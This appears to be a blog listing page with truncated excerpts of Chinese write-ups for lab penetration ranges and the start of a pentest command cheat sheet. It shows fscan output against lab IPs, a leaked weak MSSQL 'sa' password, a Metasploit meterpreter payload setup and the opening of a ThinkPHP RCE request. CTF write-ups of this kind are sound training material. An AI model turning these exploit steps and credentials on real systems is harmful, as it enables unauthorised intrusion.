certify
CertifyCertify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagSolr RCE、AD CS、SMB、Kerberos、域渗透 信息收集./fscan.exe -h 39.98.107.120 -nobr 1234567891011start infoscan39.98.107.120:80 open39.98.107.120:22 open39.98.107.120:8983 open[*] alive ports len is: 3start vulscan[*] WebTitle http://39.98.107.120 code:200 len:612 title:Welcome to nginx![*] WebTitle http://39.98.107.120:8983 code:302 len:0 title:None 跳转url:...
time
TimeTime是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagNeo4j、Privilege Elevation、Kerberos、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.107.186 -p 1-65535 -nobr 123456789101112131415161718192021222324 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| <\____/ |___/\___|_| \__,_|\___|_|\_\ ...
Brute4Road
Brute4RoadBrute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagRedis、Brute Force、SMB、Privilege Elevation、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.134.237 12345678910111213start infoscan39.99.134.237:22 open39.99.134.237:80 open39.99.134.237:21 open39.99.134.237:6379 open[*] alive ports len is: 4start vulscan[*] WebTitle http://39.99.134.237 code:200 len:4833 title:Welcome to CentOS[+] ftp 39.99.134.237:21:...
tsclient
tsclient春秋云镜域渗透靶场中难度为中等的靶场环境。该靶场有3个flag,各部分位于不同的机器上。 tagMSSQL、Privilege Elevation、Kerberos、域渗透、RDP 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.113.109 1234567start infoscan39.98.113.109:80 open39.98.113.109:1433 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.98.113.109 code:200 len:703 title:IIS Windows Server[+] mssql 39.98.113.109:1433:sa 1qaz!QAZ 机器18显示MSSQL数据库存在弱口令:用户名为sa,密码为1qaz!QAZ。 12345678use exploit/windows/mssql/mssql_payloadset payload windows/x64/meterpreter/bin...
initial
Initial春秋云镜域渗透靶场中难度为简单的靶场环境。该靶场只有一个flag,各部分位于不同的机器上。 tagDCSync、CVE、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.138.127 -nobr 1234567start infoscan39.99.138.127:22 open39.99.138.127:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.99.138.127 code:200 len:5578 title:Bootstrap Material Admin[+] PocScan http://39.99.138.127 poc-yaml-thinkphp5023-method-rce poc1 发现thinkphp5023这个rce漏洞,搜索相关漏洞,payload如下 123456789101112131415POST /index.php?s=captcha HTTP/1.1Host: 39.99.138.127C...
渗透
渗透常用命令linux cd: 切换目录 cd /home/user/a/b/cls: 列出目录内容 ls -lcp: 复制文件 cp 1.txt /home/user/amv: 移动文件 mv .txt /home/user/arm: 删除文件 rm -rf acat: 查看文件内容 cat /home/user/1.txtmore: 分页查看文件内容 more /home/user/1.txtless: 分页查看文件内容 less /home/user/1.txtping: 测试网络连接 ping baidu.comifconfig: 查看网络配置信息 ifconfigps: 查看当前运行的进程 ps auxkill: 结束指定的进程 kill -9 1234clear: 清除屏幕 clearshutdown: 关闭计算机 shutdown -h nowtee: 读取标准输入的数...